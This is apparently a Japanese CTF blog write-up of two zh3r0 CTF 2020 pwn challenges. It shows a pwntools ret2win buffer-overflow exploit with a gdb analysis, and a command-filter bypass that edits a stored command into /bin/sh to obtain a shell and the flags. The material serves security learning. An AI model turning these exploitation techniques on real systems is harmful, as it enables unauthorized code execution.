kanyewest CTF

勉強したことをメモしています。

zh3r0 CTF 2020【Write up】

CTF

Free Flag

$ file chall 
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=518d3397ca0a0d5e98e900e3f2e2937de34e3554, not stripped

$ checksec.sh --file=./chall 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   72 Symbols     No       0               1       ./chall

$ ./chall 
Welcome to zh3r0 ctf.
Please provide us your name: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (コアダンプ)

BOFがあることがわかります。

gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x0000000000400598  _init
0x00000000004005c0  puts@plt
0x00000000004005d0  system@plt
0x00000000004005e0  alarm@plt
0x00000000004005f0  read@plt
0x0000000000400600  setvbuf@plt
0x0000000000400610  exit@plt
0x0000000000400620  _start
0x0000000000400650  _dl_relocate_static_pie
0x0000000000400660  deregister_tm_clones
0x0000000000400690  register_tm_clones
0x00000000004006d0  __do_global_dtors_aux
0x0000000000400700  frame_dummy
0x0000000000400707  win_win
0x000000000040071a  here
0x000000000040076e  init
0x00000000004007d9  main
0x0000000000400800  __libc_csu_init
0x0000000000400870  __libc_csu_fini
0x0000000000400874  _fini
gdb-peda$ pdisas win_win
Dump of assembler code for function win_win:
   0x0000000000400707 <+0>:     push   rbp
   0x0000000000400708 <+1>:     mov    rbp,rsp
   0x000000000040070b <+4>:     lea    rdi,[rip+0x172]        # 0x400884
   0x0000000000400712 <+11>:    call   0x4005d0 <system@plt>
   0x0000000000400717 <+16>:    nop
   0x0000000000400718 <+17>:    pop    rbp
   0x0000000000400719 <+18>:    ret    
End of assembler dump.
gdb-peda$ x/s 0x400884
0x400884:       "cat flag.txt"
gdb-peda$

gdbでデバッグしてみると、win_winという関数がありこれを呼び出せばsystem("cat flag.txt")が実行されることがわかります。

以下がExploitコードになります。

from pwn import *

e = ELF('./chall')
#p = process('./chall')
p = remote('us.pwn.zh3r0.ml',3456)

flag = e.symbols['win_win']
ret_addr = 0x004005ae

payload = 'A'*40
payload += p64(ret_addr)
payload += p64(flag)

print p.recvuntil('name:')
p.sendline(payload)
p.interactive()

$ python solve.py 
[*]
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to us.pwn.zh3r0.ml on port 3456: Done
Welcome to zh3r0 ctf.
Please provide us your name:
[*] Switching to interactive mode
 
zh3r0{welcome_to_zh3r0_ctf}

[*] Got EOF while reading in interactive
$ 
[*] Closed connection to us.pwn.zh3r0.ml port 3456
[*] Got EOF while sending in interactive

Command-1

command_1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a90b629e4472aa6f35d5749a3bf1cab50f8bdb5a, not stripped

$ checksec.sh --file=command_1
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   86 Symbols     Yes      0               4       command_1

$ ./command_1 
Please enter your name: AAAA
Hello AAAA

-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> /bin/sh
I don't see where you are going you idiot

1.) Add commandで"/bin/sh"を入力すると当然ですが弾かれます。しかし、一旦適当な文字列をAddした後にEditすると好きなコマンドを入力することができます。それだけです。

$ ./command_1 
Please enter your name: 1
Hello 1

-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> AAA
Command added at index [0]
.-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 3
Enter index you want to edit: 
0        
Enter new command -> /bin/sh
Command edited.
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 2
So you want to run the command:
Enter the index of the command: ls
$ id

$ nc us.pwn.zh3r0.ml 8520
Please enter your name: tekashi
Hello tekashi

-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> ls
Command added at index [0]
.-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 3
Enter index you want to edit: 
0     
Enter new command -> cat "flag.txt"
Command edited.
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 2
So you want to run the command:
Enter the index of the command: 0
zh3r0{the_intended_sol_useoverflow_change_nextpointer_toFakechunk_in_bssname}
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.